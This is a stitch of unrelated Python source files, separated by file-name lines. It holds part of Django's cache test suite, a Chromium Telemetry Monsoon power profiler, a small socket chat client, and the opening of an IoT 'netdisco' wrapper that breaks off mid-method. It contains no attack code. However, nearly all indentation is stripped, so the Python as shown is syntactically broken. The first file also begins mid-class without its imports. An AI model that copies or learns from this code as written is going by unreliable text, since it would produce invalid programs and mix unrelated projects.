"""Tests that verify that settings having Cache arguments with a TIMEOUT
set to `None` will create Caches that will set non-expiring keys.
This fixes ticket #22085.
"""
def setUp(self):
# The 5 minute (300 seconds) default expiration time for keys is
# defined in the implementation of the initializer method of the
# BaseCache type.
self.DEFAULT_TIMEOUT = caches[DEFAULT_CACHE_ALIAS].default_timeout
def tearDown(self):
del(self.DEFAULT_TIMEOUT)
def test_default_expiration_time_for_keys_is_5_minutes(self):
"""The default expiration time of a cache key is 5 minutes.
This value is defined inside the __init__() method of the
:class:`django.core.cache.backends.base.BaseCache` type.
"""
self.assertEqual(300, self.DEFAULT_TIMEOUT)
def test_caches_with_unset_timeout_has_correct_default_timeout(self):
"""Caches that have the TIMEOUT parameter undefined in the default
settings will use the default 5 minute timeout.
"""
cache = caches[DEFAULT_CACHE_ALIAS]
self.assertEqual(self.DEFAULT_TIMEOUT, cache.default_timeout)
@override_settings(CACHES=NEVER_EXPIRING_CACHES_SETTINGS)
def test_caches_set_with_timeout_as_none_has_correct_default_timeout(self):
"""Memory caches that have the TIMEOUT parameter set to `None` in the
        default settings will have `None` as the default timeout.
This means "no timeout".
"""
cache = caches[DEFAULT_CACHE_ALIAS]
self.assertIsNone(cache.default_timeout)
self.assertIsNone(cache.get_backend_timeout())
@override_settings(CACHES=DEFAULT_MEMORY_CACHES_SETTINGS)
def test_caches_with_unset_timeout_set_expiring_key(self):
"""Memory caches that have the TIMEOUT parameter unset will set cache
keys having the default 5 minute timeout.
"""
key = "my-key"
value = "my-value"
cache = caches[DEFAULT_CACHE_ALIAS]
cache.set(key, value)
cache_key = cache.make_key(key)
self.assertIsNotNone(cache._expire_info[cache_key])
@override_settings(CACHES=NEVER_EXPIRING_CACHES_SETTINGS)
    def test_caches_set_with_timeout_as_none_set_non_expiring_key(self):
"""Memory caches that have the TIMEOUT parameter set to `None` will set
a non expiring key by default.
"""
key = "another-key"
value = "another-value"
cache = caches[DEFAULT_CACHE_ALIAS]
cache.set(key, value)
cache_key = cache.make_key(key)
self.assertIsNone(cache._expire_info[cache_key])
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX='settingsprefix',
CACHE_MIDDLEWARE_SECONDS=1,
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
USE_I18N=False,
)
class CacheUtils(TestCase):
"""TestCase for django.utils.cache functions."""
def setUp(self):
self.host = 'www.example.com'
self.path = '/cache/test/'
self.factory = RequestFactory(HTTP_HOST=self.host)
def tearDown(self):
cache.clear()
def _get_request_cache(self, method='GET', query_string=None, update_cache=None):
request = self._get_request(self.host, self.path,
method, query_string=query_string)
request._cache_update_cache = True if not update_cache else update_cache
return request
def _set_cache(self, request, msg):
response = HttpResponse()
response.content = msg
return UpdateCacheMiddleware().process_response(request, response)
def test_patch_vary_headers(self):
headers = (
# Initial vary, new headers, resulting vary.
(None, ('Accept-Encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('accept-encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('ACCEPT-ENCODING',), 'Accept-Encoding'),
('Cookie', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
(None, ('Accept-Encoding', 'COOKIE'), 'Accept-Encoding, COOKIE'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
('Cookie , Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
)
for initial_vary, newheaders, resulting_vary in headers:
response = HttpResponse()
if initial_vary is not None:
response['Vary'] = initial_vary
patch_vary_headers(response, newheaders)
self.assertEqual(response['Vary'], resulting_vary)
def test_get_cache_key(self):
request = self.factory.get(self.path)
response = HttpResponse()
# Expect None if no headers have been set yet.
self.assertIsNone(get_cache_key(request))
# Set headers to an empty list.
learn_cache_key(request, response)
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'18a03f9c9649f7d684af5db3524f5c99.d41d8cd98f00b204e9800998ecf8427e'
)
# Verify that a specified key_prefix is taken into account.
key_prefix = 'localprefix'
learn_cache_key(request, response, key_prefix=key_prefix)
self.assertEqual(
get_cache_key(request, key_prefix=key_prefix),
'views.decorators.cache.cache_page.localprefix.GET.'
'18a03f9c9649f7d684af5db3524f5c99.d41d8cd98f00b204e9800998ecf8427e'
)
def test_get_cache_key_with_query(self):
request = self.factory.get(self.path, {'test': 1})
response = HttpResponse()
# Expect None if no headers have been set yet.
self.assertIsNone(get_cache_key(request))
# Set headers to an empty list.
learn_cache_key(request, response)
# Verify that the querystring is taken into account.
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'beaf87a9a99ee81c673ea2d67ccbec2a.d41d8cd98f00b204e9800998ecf8427e'
)
def test_cache_key_varies_by_url(self):
"""
get_cache_key keys differ by fully-qualified URL instead of path
"""
request1 = self.factory.get(self.path, HTTP_HOST='sub-1.example.com')
learn_cache_key(request1, HttpResponse())
request2 = self.factory.get(self.path, HTTP_HOST='sub-2.example.com')
learn_cache_key(request2, HttpResponse())
self.assertNotEqual(get_cache_key(request1), get_cache_key(request2))
def test_learn_cache_key(self):
request = self.factory.head(self.path)
response = HttpResponse()
response['Vary'] = 'Pony'
# Make sure that the Vary header is added to the key hash
learn_cache_key(request, response)
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'18a03f9c9649f7d684af5db3524f5c99.d41d8cd98f00b204e9800998ecf8427e'
)
def test_patch_cache_control(self):
tests = (
# Initial Cache-Control, kwargs to patch_cache_control, expected Cache-Control parts
(None, {'private': True}, {'private'}),
# Test whether private/public attributes are mutually exclusive
('private', {'private': True}, {'private'}),
('private', {'public': True}, {'public'}),
('public', {'public': True}, {'public'}),
('public', {'private': True}, {'private'}),
('must-revalidate,max-age=60,private', {'public': True}, {'must-revalidate', 'max-age=60', 'public'}),
('must-revalidate,max-age=60,public', {'private': True}, {'must-revalidate', 'max-age=60', 'private'}),
('must-revalidate,max-age=60', {'public': True}, {'must-revalidate', 'max-age=60', 'public'}),
)
cc_delim_re = re.compile(r'\s*,\s*')
for initial_cc, newheaders, expected_cc in tests:
response = HttpResponse()
if initial_cc is not None:
response['Cache-Control'] = initial_cc
patch_cache_control(response, **newheaders)
parts = set(cc_delim_re.split(response['Cache-Control']))
self.assertEqual(parts, expected_cc)
@override_settings(
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'KEY_PREFIX': 'cacheprefix',
},
},
)
class PrefixedCacheUtils(CacheUtils):
pass
@override_settings(
CACHE_MIDDLEWARE_SECONDS=60,
CACHE_MIDDLEWARE_KEY_PREFIX='test',
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
)
class CacheHEADTest(TestCase):
def setUp(self):
self.path = '/cache/test/'
self.factory = RequestFactory()
def tearDown(self):
cache.clear()
def _set_cache(self, request, msg):
response = HttpResponse()
response.content = msg
return UpdateCacheMiddleware().process_response(request, response)
def test_head_caches_correctly(self):
test_content = 'test content'
request = self.factory.head(self.path)
request._cache_update_cache = True
self._set_cache(request, test_content)
request = self.factory.head(self.path)
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNotNone(get_cache_data)
self.assertEqual(test_content.encode(), get_cache_data.content)
def test_head_with_cached_get(self):
test_content = 'test content'
request = self.factory.get(self.path)
request._cache_update_cache = True
self._set_cache(request, test_content)
request = self.factory.head(self.path)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNotNone(get_cache_data)
self.assertEqual(test_content.encode(), get_cache_data.content)
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX='settingsprefix',
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
LANGUAGES=[
('en', 'English'),
('es', 'Spanish'),
],
)
class CacheI18nTest(TestCase):
def setUp(self):
self.path = '/cache/test/'
self.factory = RequestFactory()
def tearDown(self):
cache.clear()
@override_settings(USE_I18N=True, USE_L10N=False, USE_TZ=False)
def test_cache_key_i18n_translation(self):
request = self.factory.get(self.path)
lang = translation.get_language()
response = HttpResponse()
key = learn_cache_key(request, response)
self.assertIn(lang, key, "Cache keys should include the language name when translation is active")
key2 = get_cache_key(request)
self.assertEqual(key, key2)
def check_accept_language_vary(self, accept_language, vary, reference_key):
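        # Regardless of the Accept-Language value or the ordering of the Vary
        # header fields, the computed cache key should match ``reference_key``.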
request = self.factory.get(self.path)
request.META['HTTP_ACCEPT_LANGUAGE'] = accept_language
request.META['HTTP_ACCEPT_ENCODING'] = 'gzip;q=1.0, identity; q=0.5, *;q=0'
response = HttpResponse()
response['Vary'] = vary
key = learn_cache_key(request, response)
key2 = get_cache_key(request)
self.assertEqual(key, reference_key)
self.assertEqual(key2, reference_key)
@override_settings(USE_I18N=True, USE_L10N=False, USE_TZ=False)
def test_cache_key_i18n_translation_accept_language(self):
lang = translation.get_language()
self.assertEqual(lang, 'en')
request = self.factory.get(self.path)
request.META['HTTP_ACCEPT_ENCODING'] = 'gzip;q=1.0, identity; q=0.5, *;q=0'
response = HttpResponse()
response['Vary'] = 'accept-encoding'
key = learn_cache_key(request, response)
self.assertIn(lang, key, "Cache keys should include the language name when translation is active")
self.check_accept_language_vary(
'en-us',
'cookie, accept-language, accept-encoding',
key
)
self.check_accept_language_vary(
'en-US',
'cookie, accept-encoding, accept-language',
key
)
self.check_accept_language_vary(
'en-US,en;q=0.8',
'accept-encoding, accept-language, cookie',
key
)
self.check_accept_language_vary(
'en-US,en;q=0.8,ko;q=0.6',
'accept-language, cookie, accept-encoding',
key
)
self.check_accept_language_vary(
'ko-kr,ko;q=0.8,en-us;q=0.5,en;q=0.3 ',
'accept-encoding, cookie, accept-language',
key
)
self.check_accept_language_vary(
'ko-KR,ko;q=0.8,en-US;q=0.6,en;q=0.4',
'accept-language, accept-encoding, cookie',
key
)
self.check_accept_language_vary(
'ko;q=1.0,en;q=0.5',
'cookie, accept-language, accept-encoding',
key
)
self.check_accept_language_vary(
'ko, en',
'cookie, accept-encoding, accept-language',
key
)
self.check_accept_language_vary(
'ko-KR, en-US',
'accept-encoding, accept-language, cookie',
key
)
@override_settings(USE_I18N=False, USE_L10N=True, USE_TZ=False)
def test_cache_key_i18n_formatting(self):
request = self.factory.get(self.path)
lang = translation.get_language()
response = HttpResponse()
key = learn_cache_key(request, response)
self.assertIn(lang, key, "Cache keys should include the language name when formatting is active")
key2 = get_cache_key(request)
self.assertEqual(key, key2)
@override_settings(USE_I18N=False, USE_L10N=False, USE_TZ=True)
def test_cache_key_i18n_timezone(self):
request = self.factory.get(self.path)
# This is tightly coupled to the implementation,
# but it's the most straightforward way to test the key.
tz = force_text(timezone.get_current_timezone_name(), errors='ignore')
tz = tz.encode('ascii', 'ignore').decode('ascii').replace(' ', '_')
response = HttpResponse()
key = learn_cache_key(request, response)
self.assertIn(tz, key, "Cache keys should include the time zone name when time zones are active")
key2 = get_cache_key(request)
self.assertEqual(key, key2)
@override_settings(USE_I18N=False, USE_L10N=False)
def test_cache_key_no_i18n(self):
request = self.factory.get(self.path)
lang = translation.get_language()
tz = force_text(timezone.get_current_timezone_name(), errors='ignore')
tz = tz.encode('ascii', 'ignore').decode('ascii').replace(' ', '_')
response = HttpResponse()
key = learn_cache_key(request, response)
self.assertNotIn(lang, key, "Cache keys shouldn't include the language name when i18n isn't active")
self.assertNotIn(tz, key, "Cache keys shouldn't include the time zone name when i18n isn't active")
@override_settings(USE_I18N=False, USE_L10N=False, USE_TZ=True)
def test_cache_key_with_non_ascii_tzname(self):
# Regression test for #17476
class CustomTzName(timezone.UTC):
name = ''
def tzname(self, dt):
return self.name
request = self.factory.get(self.path)
response = HttpResponse()
with timezone.override(CustomTzName()):
CustomTzName.name = 'Hora estándar de Argentina'.encode('UTF-8') # UTF-8 string
sanitized_name = 'Hora_estndar_de_Argentina'
self.assertIn(sanitized_name, learn_cache_key(request, response),
"Cache keys should include the time zone name when time zones are active")
CustomTzName.name = 'Hora estándar de Argentina' # unicode
sanitized_name = 'Hora_estndar_de_Argentina'
self.assertIn(sanitized_name, learn_cache_key(request, response),
"Cache keys should include the time zone name when time zones are active")
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX="test",
CACHE_MIDDLEWARE_SECONDS=60,
USE_ETAGS=True,
USE_I18N=True,
)
def test_middleware(self):
def set_cache(request, lang, msg):
translation.activate(lang)
response = HttpResponse()
response.content = msg
return UpdateCacheMiddleware().process_response(request, response)
# cache with non empty request.GET
request = self.factory.get(self.path, {'foo': 'bar', 'other': 'true'})
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware().process_request(request)
# first access, cache must return None
self.assertIsNone(get_cache_data)
response = HttpResponse()
content = 'Check for cache with QUERY_STRING'
response.content = content
UpdateCacheMiddleware().process_response(request, response)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
# cache must return content
self.assertIsNotNone(get_cache_data)
self.assertEqual(get_cache_data.content, content.encode())
# different QUERY_STRING, cache must be empty
request = self.factory.get(self.path, {'foo': 'bar', 'somethingelse': 'true'})
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNone(get_cache_data)
# i18n tests
en_message = "Hello world!"
es_message = "Hola mundo!"
request = self.factory.get(self.path)
request._cache_update_cache = True
set_cache(request, 'en', en_message)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
# Check that we can recover the cache
self.assertIsNotNone(get_cache_data)
self.assertEqual(get_cache_data.content, en_message.encode())
# Check that we use etags
self.assertTrue(get_cache_data.has_header('ETag'))
# Check that we can disable etags
with self.settings(USE_ETAGS=False):
request._cache_update_cache = True
set_cache(request, 'en', en_message)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertFalse(get_cache_data.has_header('ETag'))
# change the session language and set content
request = self.factory.get(self.path)
request._cache_update_cache = True
set_cache(request, 'es', es_message)
# change again the language
translation.activate('en')
# retrieve the content from cache
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertEqual(get_cache_data.content, en_message.encode())
# change again the language
translation.activate('es')
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertEqual(get_cache_data.content, es_message.encode())
# reset the language
translation.deactivate()
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX="test",
CACHE_MIDDLEWARE_SECONDS=60,
USE_ETAGS=True,
)
def test_middleware_doesnt_cache_streaming_response(self):
request = self.factory.get(self.path)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNone(get_cache_data)
# This test passes on Python < 3.3 even without the corresponding code
# in UpdateCacheMiddleware, because pickling a StreamingHttpResponse
# fails (http://bugs.python.org/issue14288). LocMemCache silently
# swallows the exception and doesn't store the response in cache.
content = ['Check for cache with streaming content.']
response = StreamingHttpResponse(content)
UpdateCacheMiddleware().process_response(request, response)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertIsNone(get_cache_data)
@override_settings(
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'KEY_PREFIX': 'cacheprefix'
},
},
)
class PrefixedCacheI18nTest(CacheI18nTest):
pass
def hello_world_view(request, value):
return HttpResponse('Hello World %s' % value)
def csrf_view(request):
return HttpResponse(csrf(request)['csrf_token'])
@override_settings(
CACHE_MIDDLEWARE_ALIAS='other',
CACHE_MIDDLEWARE_KEY_PREFIX='middlewareprefix',
CACHE_MIDDLEWARE_SECONDS=30,
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
'other': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'other',
'TIMEOUT': '1',
},
},
)
class CacheMiddlewareTest(TestCase):
def setUp(self):
super(CacheMiddlewareTest, self).setUp()
self.factory = RequestFactory()
self.default_cache = caches['default']
self.other_cache = caches['other']
def tearDown(self):
self.default_cache.clear()
self.other_cache.clear()
super(CacheMiddlewareTest, self).tearDown()
def test_constructor(self):
"""
        Ensure the constructor correctly distinguishes between using CacheMiddleware
        as middleware and as a view decorator, and sets its attributes accordingly.
"""
# If no arguments are passed in construction, it's being used as middleware.
middleware = CacheMiddleware()
# Now test object attributes against values defined in setUp above
self.assertEqual(middleware.cache_timeout, 30)
self.assertEqual(middleware.key_prefix, 'middlewareprefix')
self.assertEqual(middleware.cache_alias, 'other')
# If arguments are being passed in construction, it's being used as a decorator.
# First, test with "defaults":
as_view_decorator = CacheMiddleware(cache_alias=None, key_prefix=None)
self.assertEqual(as_view_decorator.cache_timeout, 30) # Timeout value for 'default' cache, i.e. 30
self.assertEqual(as_view_decorator.key_prefix, '')
self.assertEqual(as_view_decorator.cache_alias, 'default') # Value of DEFAULT_CACHE_ALIAS from django.core.cache
# Next, test with custom values:
as_view_decorator_with_custom = CacheMiddleware(cache_timeout=60, cache_alias='other', key_prefix='foo')
self.assertEqual(as_view_decorator_with_custom.cache_timeout, 60)
self.assertEqual(as_view_decorator_with_custom.key_prefix, 'foo')
self.assertEqual(as_view_decorator_with_custom.cache_alias, 'other')
def test_middleware(self):
middleware = CacheMiddleware()
prefix_middleware = CacheMiddleware(key_prefix='prefix1')
timeout_middleware = CacheMiddleware(cache_timeout=1)
request = self.factory.get('/view/')
# Put the request through the request middleware
result = middleware.process_request(request)
self.assertIsNone(result)
response = hello_world_view(request, '1')
# Now put the response through the response middleware
response = middleware.process_response(request, response)
# Repeating the request should result in a cache hit
result = middleware.process_request(request)
self.assertIsNotNone(result)
self.assertEqual(result.content, b'Hello World 1')
# The same request through a different middleware won't hit
result = prefix_middleware.process_request(request)
self.assertIsNone(result)
# The same request with a timeout _will_ hit
result = timeout_middleware.process_request(request)
self.assertIsNotNone(result)
self.assertEqual(result.content, b'Hello World 1')
def test_view_decorator(self):
# decorate the same view with different cache decorators
default_view = cache_page(3)(hello_world_view)
default_with_prefix_view = cache_page(3, key_prefix='prefix1')(hello_world_view)
explicit_default_view = cache_page(3, cache='default')(hello_world_view)
explicit_default_with_prefix_view = cache_page(3, cache='default', key_prefix='prefix1')(hello_world_view)
other_view = cache_page(1, cache='other')(hello_world_view)
other_with_prefix_view = cache_page(1, cache='other', key_prefix='prefix2')(hello_world_view)
request = self.factory.get('/view/')
# Request the view once
response = default_view(request, '1')
self.assertEqual(response.content, b'Hello World 1')
# Request again -- hit the cache
response = default_view(request, '2')
self.assertEqual(response.content, b'Hello World 1')
# Requesting the same view with the explicit cache should yield the same result
response = explicit_default_view(request, '3')
self.assertEqual(response.content, b'Hello World 1')
# Requesting with a prefix will hit a different cache key
response = explicit_default_with_prefix_view(request, '4')
self.assertEqual(response.content, b'Hello World 4')
# Hitting the same view again gives a cache hit
response = explicit_default_with_prefix_view(request, '5')
self.assertEqual(response.content, b'Hello World 4')
# And going back to the implicit cache will hit the same cache
response = default_with_prefix_view(request, '6')
self.assertEqual(response.content, b'Hello World 4')
# Requesting from an alternate cache won't hit cache
response = other_view(request, '7')
self.assertEqual(response.content, b'Hello World 7')
# But a repeated hit will hit cache
response = other_view(request, '8')
self.assertEqual(response.content, b'Hello World 7')
# And prefixing the alternate cache yields yet another cache entry
response = other_with_prefix_view(request, '9')
self.assertEqual(response.content, b'Hello World 9')
# But if we wait a couple of seconds...
time.sleep(2)
# ... the default cache will still hit
response = default_view(request, '11')
self.assertEqual(response.content, b'Hello World 1')
# ... the default cache with a prefix will still hit
response = default_with_prefix_view(request, '12')
self.assertEqual(response.content, b'Hello World 4')
# ... the explicit default cache will still hit
response = explicit_default_view(request, '13')
self.assertEqual(response.content, b'Hello World 1')
# ... the explicit default cache with a prefix will still hit
response = explicit_default_with_prefix_view(request, '14')
self.assertEqual(response.content, b'Hello World 4')
# .. but a rapidly expiring cache won't hit
response = other_view(request, '15')
self.assertEqual(response.content, b'Hello World 15')
# .. even if it has a prefix
response = other_with_prefix_view(request, '16')
self.assertEqual(response.content, b'Hello World 16')
def test_sensitive_cookie_not_cached(self):
"""
Django must prevent caching of responses that set a user-specific (and
maybe security sensitive) cookie in response to a cookie-less request.
"""
csrf_middleware = CsrfViewMiddleware()
cache_middleware = CacheMiddleware()
request = self.factory.get('/view/')
self.assertIsNone(cache_middleware.process_request(request))
csrf_middleware.process_view(request, csrf_view, (), {})
response = csrf_view(request)
response = csrf_middleware.process_response(request, response)
response = cache_middleware.process_response(request, response)
# Inserting a CSRF cookie in a cookie-less request prevented caching.
self.assertIsNone(cache_middleware.process_request(request))
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX='settingsprefix',
CACHE_MIDDLEWARE_SECONDS=1,
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
USE_I18N=False,
)
class TestWithTemplateResponse(TestCase):
"""
    Tests various headers with TemplateResponse.
    Most are probably redundant since they manipulate the same object
    anyway, but the ETag header is 'special' because it relies on the
    content being complete (which is not necessarily always the case
    with a TemplateResponse).
"""
def setUp(self):
self.path = '/cache/test/'
self.factory = RequestFactory()
def tearDown(self):
cache.clear()
def test_patch_vary_headers(self):
headers = (
# Initial vary, new headers, resulting vary.
(None, ('Accept-Encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('accept-encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('ACCEPT-ENCODING',), 'Accept-Encoding'),
('Cookie', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
(None, ('Accept-Encoding', 'COOKIE'), 'Accept-Encoding, COOKIE'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
('Cookie , Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
)
for initial_vary, newheaders, resulting_vary in headers:
template = engines['django'].from_string("This is a test")
response = TemplateResponse(HttpRequest(), template)
if initial_vary is not None:
response['Vary'] = initial_vary
patch_vary_headers(response, newheaders)
self.assertEqual(response['Vary'], resulting_vary)
def test_get_cache_key(self):
request = self.factory.get(self.path)
template = engines['django'].from_string("This is a test")
response = TemplateResponse(HttpRequest(), template)
key_prefix = 'localprefix'
# Expect None if no headers have been set yet.
self.assertIsNone(get_cache_key(request))
# Set headers to an empty list.
learn_cache_key(request, response)
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'58a0a05c8a5620f813686ff969c26853.d41d8cd98f00b204e9800998ecf8427e'
)
# Verify that a specified key_prefix is taken into account.
learn_cache_key(request, response, key_prefix=key_prefix)
self.assertEqual(
get_cache_key(request, key_prefix=key_prefix),
'views.decorators.cache.cache_page.localprefix.GET.'
'58a0a05c8a5620f813686ff969c26853.d41d8cd98f00b204e9800998ecf8427e'
)
def test_get_cache_key_with_query(self):
request = self.factory.get(self.path, {'test': 1})
template = engines['django'].from_string("This is a test")
response = TemplateResponse(HttpRequest(), template)
# Expect None if no headers have been set yet.
self.assertIsNone(get_cache_key(request))
# Set headers to an empty list.
learn_cache_key(request, response)
# Verify that the querystring is taken into account.
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'0f1c2d56633c943073c4569d9a9502fe.d41d8cd98f00b204e9800998ecf8427e'
)
@override_settings(USE_ETAGS=False)
def test_without_etag(self):
template = engines['django'].from_string("This is a test")
response = TemplateResponse(HttpRequest(), template)
self.assertFalse(response.has_header('ETag'))
patch_response_headers(response)
self.assertFalse(response.has_header('ETag'))
response = response.render()
self.assertFalse(response.has_header('ETag'))
@override_settings(USE_ETAGS=True)
def test_with_etag(self):
template = engines['django'].from_string("This is a test")
response = TemplateResponse(HttpRequest(), template)
self.assertFalse(response.has_header('ETag'))
patch_response_headers(response)
self.assertFalse(response.has_header('ETag'))
response = response.render()
self.assertTrue(response.has_header('ETag'))
class TestMakeTemplateFragmentKey(TestCase):
def test_without_vary_on(self):
key = make_template_fragment_key('a.fragment')
self.assertEqual(key, 'template.cache.a.fragment.d41d8cd98f00b204e9800998ecf8427e')
def test_with_one_vary_on(self):
key = make_template_fragment_key('foo', ['abc'])
self.assertEqual(key,
'template.cache.foo.900150983cd24fb0d6963f7d28e17f72')
def test_with_many_vary_on(self):
key = make_template_fragment_key('bar', ['abc', 'def'])
self.assertEqual(key,
'template.cache.bar.4b35f12ab03cec09beec4c21b2d2fa88')
def test_proper_escaping(self):
key = make_template_fragment_key('spam', ['abc:def%'])
self.assertEqual(key,
'template.cache.spam.f27688177baec990cdf3fbd9d9c3f469')
class CacheHandlerTest(TestCase):
def test_same_instance(self):
"""
Attempting to retrieve the same alias should yield the same instance.
"""
cache1 = caches['default']
cache2 = caches['default']
self.assertIs(cache1, cache2)
def test_per_thread(self):
"""
Requesting the same alias from separate threads should yield separate
instances.
"""
c = []
def runner():
c.append(caches['default'])
for x in range(2):
t = threading.Thread(target=runner)
t.start()
t.join()
self.assertIsNot(c[0], c[1])
|
monsoon_profiler.py
|
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import csv
import multiprocessing
import os
import sys
from telemetry.core import exceptions
from telemetry.core import util
from telemetry.core.platform import profiler
sys.path.append(os.path.join(util.GetTelemetryDir(), 'third_party', 'internal'))
try:
import monsoon # pylint: disable=F0401
except ImportError:
monsoon = None
def _CollectData(output_path, is_collecting):
mon = monsoon.Monsoon(wait=False)
mon.SetMaxCurrent(2.0)
# Note: Telemetry requires the device to be connected by USB, but that
# puts it in charging mode. This increases the power consumption.
mon.SetUsbPassthrough(1)
# Nominal Li-ion voltage is 3.7V, but it puts out 4.2V at max capacity. Use
# 4.0V to simulate a "~80%" charged battery. Google "li-ion voltage curve".
# This is true only for a single cell. (Most smartphones, some tablets.)
mon.SetVoltage(4.0)
samples = []
try:
mon.StartDataCollection()
# Do one CollectData() to make the Monsoon set up, which takes about
# 0.3 seconds, and only signal that we've started after that.
mon.CollectData()
is_collecting.set()
while is_collecting.is_set():
samples += mon.CollectData()
finally:
mon.StopDataCollection()
# Add x-axis labels.
plot_data = [(i / 5000., sample) for i, sample in enumerate(samples)]
# Print data in csv.
with open(output_path, 'w') as output_file:
output_writer = csv.writer(output_file)
output_writer.writerows(plot_data)
output_file.flush()
print 'To view the Monsoon profile, run:'
print (' echo "set datafile separator \',\'; plot \'%s\' with lines" | '
'gnuplot --persist' % output_path)
class MonsoonProfiler(profiler.Profiler):
"""Profiler that tracks current using Monsoon Power Monitor.
http://www.msoon.com/LabEquipment/PowerMonitor/
The Monsoon device measures current in amps at 5000 samples/second.
"""
def __init__(self, browser_backend, platform_backend, output_path, state):
super(MonsoonProfiler, self).__init__(
browser_backend, platform_backend, output_path, state)
# We collect the data in a separate process, so we can continuously
# read the samples from the USB port while running the test.
self._is_collecting = multiprocessing.Event()
self._collector = multiprocessing.Process(
target=_CollectData, args=(output_path, self._is_collecting))
self._collector.start()
if not self._is_collecting.wait(timeout=0.5):
self._collector.terminate()
raise exceptions.ProfilingException('Failed to start data collection.')
@classmethod
def name(cls):
return 'monsoon'
@classmethod
def is_supported(cls, browser_type):
if not monsoon:
return False
try:
monsoon.Monsoon(wait=False)
except IOError:
return False
else:
return True
def CollectProfile(self):
self._is_collecting.clear()
self._collector.join()
return [self._output_path]
|
client.py
|
import socket
import sys
import threading
PORT = 8999
HEADER = 128
FORMAT = 'utf-8'
DISCONNECT_MESSAGE = '!DISCONNECT'
SERVER = '192.168.0.27'
ADDR = (SERVER, PORT)
def input_thread():
while True:
msg = input()
        if not msg:
continue
send(msg)
if msg == DISCONNECT_MESSAGE:
sys.exit()
def send(msg: str):
message = msg.encode(FORMAT)
msg_length = len(message)
send_length = str(msg_length).encode(FORMAT)
send_length += b' ' * (HEADER - len(send_length))
client.send(send_length)
client.send(message)
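# Sketch of a length-prefixed read helper (an assumption about the server's
# framing, mirroring send() above). socket.recv() may return fewer bytes than
# requested, so a robust reader loops until the whole chunk has arrived.
def recv_exact(sock: socket.socket, length: int) -> bytes:
    data = b''
    while len(data) < length:
        chunk = sock.recv(length - len(data))
        if not chunk:
            raise ConnectionError('connection closed while receiving')
        data += chunk
    return data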
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
thread = threading.Thread(target=input_thread)
thread.start()
try:
client.connect(ADDR)
except ConnectionRefusedError:
print('[ERROR] Server not online...')
sys.exit()
while True:
msg_length = client.recv(HEADER).decode(FORMAT)
if msg_length:
try:
msg_length = int(msg_length)
        except ValueError:
            continue
else:
msg = client.recv(msg_length).decode(FORMAT)
print(f'[MSG] {msg}')
|
netdisco_wrapper.py
|
"""
Periodically start netdisco and extract naming info about the network.
"""
import json
import requests
import stat
import subprocess
from netdisco.discovery import NetworkDiscovery
import os
import threading
import time
import utils
BASE_BINARY_PATH = 'https://github.com/noise-lab/netdisco-python-wrapper/raw/master/release/device_identifier_{os}' # noqa
DOWNLOAD_CHUNK_SIZE = 1024 * 1024
class NetdiscoWrapper(object):
def __init__(self, host_state):
self._host_state = host_state
self._os = utils.get_os()
self._netdisco_path = self._get_netdisco_path()
def start(self):
th = threading.Thread(target=self._start_thread)
th.daemon = True
th.start()
def _start_thread(self):
while True:
time.sleep(3)
if len(self._host_state.get_ip_mac_dict_copy()) > 0:
utils.safe_run(self._run_netdisco)
def _get_netdisco_path(self):
exe_name = 'iot-inspector-netdisco'
return os.path.join(
os.path.expanduser('~'),
'princeton-iot-inspector',
exe_name)
def _run_netdisco(self):
